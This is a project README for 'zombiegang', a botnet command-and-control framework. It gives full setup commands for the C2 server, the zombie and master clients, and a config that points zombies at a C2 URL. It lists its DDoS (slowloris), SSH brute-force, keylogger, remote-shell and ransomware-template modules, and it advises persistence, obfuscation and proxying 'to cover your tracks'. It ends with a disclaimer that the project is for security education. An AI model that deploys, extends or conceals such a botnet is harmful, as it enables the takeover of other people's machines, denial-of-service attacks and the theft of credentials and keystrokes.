C2 framework with a modular and extensible architecture, a task scheduler, remote-shell live sessions and a retro-looking interface that makes it fun to use. So far it includes keylogger, DDoS and brute-force modules.
The extensible botnet framework
Zombiegang is a botnet framework written mostly in Python and PHP. It supports asynchronous communication between the cc and the zombies, remote-shell live sessions and a task scheduler. It also has a plugin manager, which comes with some pre-included modules to perform the most typical attacks (DDoS, brute force and keylogger). This modular approach lets anyone extend the features by writing their own modules (I will appreciate any contribution).
The Command and Control server is a semi-CRUD API written in PHP, which manages database read/write operations and authentication. This design also keeps the front-end separate: it resides entirely in the client used by masters.
Several kinds of clients can be used to administer the botnet, and several kinds of "zombie-clients" can coexist too.
This is just a simple way to kickstart the initial setup. Obviously, in production environments you can use separate servers for the DB and the CC, and replace the HTTP server with something like Apache or Nginx.
```sh
git clone https://github.com/r3nt0n/zombiegang.git
# steps 1 and 2 are optional: only needed if mariadb is not installed yet
sudo apt-get install mariadb-server mariadb-client
sudo mysql_secure_installation
# change the default db password and create the db structure
cd cc-server
nano api/config/data/init.sql
sudo ./initdb
# log into mariadb with the password you just set in init.sql
mariadb -u zgang -p
use zgang;
insert into Masters SET username = '<your-username>', public_key = '<public-key>';
exit
```
Note: For now, when creating the new row you shouldn't specify any password; we will create it later. Also, `public_key` can be an empty string, since the PKI logic isn't implemented yet.
Optional: if you want to dump some mock zombies into the db for testing purposes, execute this file:
```sh
./dump-testdata
```
Now you need to start the HTTP server that will act as a proxy, allowing masters and zombies to interact with this db.
When editing `database.php`, you must set `$host` to an IP/hostname pointing to the db, and `$password` to the password you have just created to access it (optionally, if you changed the default db name and/or db user, update `$db_name` and `$db_user` too).
When editing `core.php`, you must change `$key` to a random string of your choice. This value is used to encode and decode JWT tokens, so pick a long, unpredictable value.
```sh
cd cc-server
# Edit this file to match your db config
nano api/config/database.php
# and create your own secret key
nano api/config/core.php
# For testing purposes, you can use the simple http server provided by php
sudo php -S 127.0.0.1:8080
```
Now you should have the cc-server listening on port 8080 and connected to the database created earlier.
Note: You can disable masters access logging in `core.php`.
```sh
# install zombieclient dependencies
cd zombie-client
pip install -r requirements.txt
# edit config to set cc-server url
nano app/config.py
# to run the zombieclient
python3 run.py
```
When editing `config.py`, you need to set `self.credentials['cc_url']` to the URL and path that point to the `api` dir located in your cc-server:
```python
self.credentials = {'cc_url': '<your-url>'}
# example:
self.credentials = {'cc_url': 'http://192.168.1.131/api'}
```
After running the zombie you should see output similar to this:
[Screenshot: zombie first wake up]
Although it may look like an error, this is expected behavior. The zombie has successfully created its user but, until we "allow it to enter", it will not be converted to a zombie and will not be able to log in with that role into the cc-server. We will cover how to accept zombies into the botnet using the master-client.
Zombies send info about themselves on every boot and check regularly for new tasks; they just keep polling and serving the cc-server forever (in fact, until you kill this process).
In real scenarios, you will also need persistence, obfuscation and probably compilation (since Python is not available by default on most systems).
```sh
# install masterclient (web-client) dependencies
cd master-client
pip install -r requirements.txt
# to run the masterclient (web-client)
./run.sh
```
Now you should have a Flask app running and listening on port 5000. Browse to http://localhost:5000 and check it. Once inside, you will see something like a desktop. You can enable/disable the proxy configuration and log in to the botnet with the appropriate software (`proxy.exe` and `zgang.exe`).
If you want to cover your tracks, use the built-in proxy tool to connect to the cc-server through the SOCKS5 proxy of your choice:
[Screenshot: proxy configuration example]
At this stage you are going to create your master password: with `zgang.exe`, create a user with the same name used in your master profile. Now you are logged in as master and can start to administer the botnet.
Note: Mozilla Firefox and Chromium are the recommended browsers, any other could work but won't be officially supported. Some visual features (e.g.: emojis, form elements...) could vary across different browsers.
If you go to the zombies section, you can see the new zombie requests to join the botnet that are awaiting your reply, and the list of zombies that have already joined. This is where we can accept the zombie created earlier.
You can schedule tasks, and the zombies will receive this info as soon as they go online and refresh their "assignments". If the task was scheduled to be executed in the future, the zombie will save this homework and run the task when the start time comes. You can also schedule stop datetimes.
There are special fields in the DB which are designed to hold nested values, so you can create new fields inside them without touching any config (e.g. `Tasks.task_content`, `Zombies.sysinfo`).
[Screenshot: zombie report example]
Additionally, there is a CLI client (keeping the msfconsole style) to log in to the cc-server and run remote-shell live sessions with online zombies; you can also connect through a SOCKS5 proxy (as in the web-based client) by setting `PXHOST` and `PXPORT` before `login`.
```sh
# to run the masterclient (cli)
python3 cli.py
```
[Screenshot: simple cli live session example]
⚠️ zombiegang is still in the development phase; some features haven't been tested under all possible scenarios yet. Any reported bug could be helpful.
From a db point of view, tools and attacks are nothing more than customized tasks. Here is the current list of customized tasks and subtypes included in the framework:
- `cmd`: execute remote commands on one or more zombies simultaneously
- `rsh`: start remote-shell live sessions with one or more zombies simultaneously (manages the delay between the zombie's update requests, allowing them to reply immediately, and toggles it off at the end of the session)
- `dos`: DDoS attacks, implemented and working
  - `dos/slowloris`
- `brt`: brute-force attacks, implemented, still needs some refactoring on master-client to create tasks
  - `brt/ssh`
- `rsw`: ransomware attacks, to be implemented (for now, just an example template)
By its nature, the keylogger module is a special task and doesn't inherit from the base class `Task`. For now, the logic to log keypresses and create logs in the cc-server is implemented in zombie-client (Windows and Linux systems). To be implemented:
See the open issues for a full list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
- `git checkout -b feature/AmazingFeature`
- `git commit -m 'Add some AmazingFeature'`
- `git push origin feature/AmazingFeature`
For more information, please check the contribution guidelines page.
Latest development version (available on GitHub)
zombiegang_0.5.1~beta (27/07/2022)
zombiegang_0.5.0~beta (25/07/2022)
zombiegang_0.1.0~beta (13/02/2021)
r3nt0n: Github - email
zombiegang: Github
This is a personal project, created for the sole purpose of security awareness and education; it should not be used against systems that you do not have permission to test/attack. The author is not responsible for misuse or for any damage that you may cause. You agree that you use this software at your own risk. I don't own the rights to any image included; it is just a fun tribute to some iconic legends (if you are the owner of any resource and want it to be removed, please contact me and I will do so as soon as possible). You can't distribute this app for commercial purposes.
Distributed under the GNU General Public License v3.0. See LICENSE for more information.